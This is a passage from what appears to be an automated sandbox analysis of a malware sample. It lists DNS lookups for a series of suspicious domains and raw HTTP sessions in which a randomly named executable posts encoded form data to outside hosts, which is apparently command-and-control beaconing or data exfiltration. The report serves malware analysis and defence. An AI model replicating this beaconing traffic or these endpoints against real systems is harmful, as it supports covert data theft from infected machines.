Jan 11, 2025 01:40:50.487972975 CET	192.168.2.5	1.1.1.1	0x1d2c	Standard query (0)	www.yunlekeji.top	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:04.319333076 CET	192.168.2.5	1.1.1.1	0x2325	Standard query (0)	www.logidant.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:18.662542105 CET	192.168.2.5	1.1.1.1	0xa064	Standard query (0)	www.laohub10.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:32.758327961 CET	192.168.2.5	1.1.1.1	0x9554	Standard query (0)	www.zkdamdjj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 01:39:52.798819065 CET	1.1.1.1	192.168.2.5	0xfe5e	No error (0)	www.izmirescortg.xyz		104.21.36.62	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:39:52.798819065 CET	1.1.1.1	192.168.2.5	0xfe5e	No error (0)	www.izmirescortg.xyz		172.67.186.192	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:08.570329905 CET	1.1.1.1	192.168.2.5	0x3850	No error (0)	www.aballanet.cat	aballanet.cat		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:40:08.570329905 CET	1.1.1.1	192.168.2.5	0x3850	No error (0)	aballanet.cat		134.0.14.158	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:22.520380020 CET	1.1.1.1	192.168.2.5	0xaca5	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:36.078814030 CET	1.1.1.1	192.168.2.5	0xe79a	No error (0)	www.canadavinreport.site		185.27.134.206	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:50.730216980 CET	1.1.1.1	192.168.2.5	0x1d2c	No error (0)	www.yunlekeji.top	www-yunlekeji-top.lo0.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:40:50.730216980 CET	1.1.1.1	192.168.2.5	0x1d2c	No error (0)	www-yunlekeji-top.lo0.faipod.com	fap-a13f5c64.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:40:50.730216980 CET	1.1.1.1	192.168.2.5	0x1d2c	No error (0)	fap-a13f5c64.faipod.com		165.154.96.210	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:40:50.730252028 CET	1.1.1.1	192.168.2.5	0x1d2c	No error (0)	www.yunlekeji.top	www-yunlekeji-top.lo0.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:40:50.730252028 CET	1.1.1.1	192.168.2.5	0x1d2c	No error (0)	www-yunlekeji-top.lo0.faipod.com	fap-a13f5c64.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:40:50.730252028 CET	1.1.1.1	192.168.2.5	0x1d2c	No error (0)	fap-a13f5c64.faipod.com		165.154.96.210	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:04.346596003 CET	1.1.1.1	192.168.2.5	0x2325	No error (0)	www.logidant.xyz	logidant.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:41:04.346596003 CET	1.1.1.1	192.168.2.5	0x2325	No error (0)	logidant.xyz		45.141.156.114	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:19.220487118 CET	1.1.1.1	192.168.2.5	0xa064	No error (0)	www.laohub10.net	r0lqcud7.nbnnn.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:41:19.220487118 CET	1.1.1.1	192.168.2.5	0xa064	No error (0)	r0lqcud7.nbnnn.xyz		27.124.4.246	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:19.220487118 CET	1.1.1.1	192.168.2.5	0xa064	No error (0)	r0lqcud7.nbnnn.xyz		202.79.161.151	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:19.220487118 CET	1.1.1.1	192.168.2.5	0xa064	No error (0)	r0lqcud7.nbnnn.xyz		23.225.159.42	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:19.220487118 CET	1.1.1.1	192.168.2.5	0xa064	No error (0)	r0lqcud7.nbnnn.xyz		23.225.160.132	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:32.770313978 CET	1.1.1.1	192.168.2.5	0x9554	No error (0)	www.zkdamdjj.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:41:32.770313978 CET	1.1.1.1	192.168.2.5	0x9554	No error (0)	www.zkdamdjj.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.izmirescortg.xyz

www.aballanet.cat

www.madhf.tech

www.canadavinreport.site

www.yunlekeji.top

www.logidant.xyz

www.laohub10.net

www.zkdamdjj.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49843	104.21.36.62	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:39:52.821410894 CET	381	OUT	GET /lnl7/?KBEhCJ=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&Kdr=RN-HMNoXj6pXm HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.izmirescortg.xyz User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 01:39:53.476918936 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:39:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvhWCnu5Ui1mrwC9nhT%2B9XIMY43LpfSSC5GvumEt%2B1w1%2FkQ56DQDs218sZseLGJVQEgeyRJDqmX1zo8tehzWAWXRHvDwEelmVyFIm6dRsWtFWv7RUUHbPDCFFqFpLCaPN%2BP%2F7LTZWA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000da2d9e2442e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=381&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED] Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div
Jan 11, 2025 01:39:53.476967096 CET	886	IN	Data Raw: 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f Data Ascii: style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49941	134.0.14.158	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:08.593410969 CET	635	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 207 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 68 75 31 5a 58 54 70 51 53 69 58 72 30 44 4f 58 67 33 75 44 6a 6b 45 39 41 68 70 56 55 47 75 6d 38 2b 61 71 47 59 3d Data Ascii: KBEhCJ=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4hu1ZXTpQSiXr0DOXg3uDjkE9AhpVUGum8+aqGY=
Jan 11, 2025 01:40:09.530838013 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:40:09 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 11, 2025 01:40:09.530857086 CET	1236	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
Jan 11, 2025 01:40:09.530870914 CET	1236	IN	Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
Jan 11, 2025 01:40:09.530942917 CET	1236	IN	Data Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
Jan 11, 2025 01:40:09.530955076 CET	1236	IN	Data Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
Jan 11, 2025 01:40:09.530966043 CET	1236	IN	Data Raw: 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 69 Data Ascii: ' /><link rel='stylesheet' id='wp-components-css' href='http://aballanet.cat/wp-includes/css/dist/components/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='wp-preferences-css' href='http://aballanet.cat/wp-includes/css/dis
Jan 11, 2025 01:40:09.530978918 CET	1236	IN	Data Raw: 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 Data Ascii: w:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='text/css'>:root{--wp--
Jan 11, 2025 01:40:09.530992031 CET	1236	IN	Data Raw: 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 Data Ascii: eg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:
Jan 11, 2025 01:40:09.531002998 CET	1236	IN	Data Raw: 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d Data Ascii: dnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--
Jan 11, 2025 01:40:09.531016111 CET	1236	IN	Data Raw: 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f Data Ascii: .25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{c
Jan 11, 2025 01:40:09.537009954 CET	1236	IN	Data Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e Data Ascii: preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49954	134.0.14.158	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:11.134444952 CET	655	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 227 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 35 35 47 70 7a 63 4f 31 2f 62 48 6d 53 62 65 30 6e 75 4b 57 4a 44 39 36 48 53 55 57 6b 4f 41 62 55 74 47 6f 4e 46 61 5a 79 65 66 62 36 72 6a 68 6f 55 70 70 5a 35 39 34 58 70 33 4b 61 64 2f 32 78 37 39 63 49 2f 54 39 31 39 44 6a 6c 42 47 2f 71 37 6e 59 2f 45 36 76 70 62 4b 5a 46 76 36 69 30 52 69 6b 6e 5a 4f 57 43 4c 54 30 52 79 77 74 2f 6b 6d 59 34 55 34 52 79 55 51 48 71 56 44 54 37 75 75 43 79 6b 4e 43 2f 47 51 44 49 38 74 54 70 65 45 6b 6e 48 38 66 75 71 30 52 4d 72 42 57 72 79 77 2f 69 52 69 78 54 2b 65 2f 74 50 6d 47 39 77 Data Ascii: KBEhCJ=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDI8tTpeEknH8fuq0RMrBWryw/iRixT+e/tPmG9w
Jan 11, 2025 01:40:11.995790005 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:40:11 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 11, 2025 01:40:11.995878935 CET	224	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin
Jan 11, 2025 01:40:11.995891094 CET	1236	IN	Data Raw: 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 Data Ascii: v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="ca_ES" /><meta property="og:title" content="Pgina no trobada - Albert Aballanet" /><meta property="og:site_name" content="Albert Aballanet" /><sc
Jan 11, 2025 01:40:11.995903969 CET	1236	IN	Data Raw: 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 Data Ascii: in.js?ver=6.7.1"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.
Jan 11, 2025 01:40:11.995915890 CET	1236	IN	Data Raw: 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 Data Ascii: illReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="w
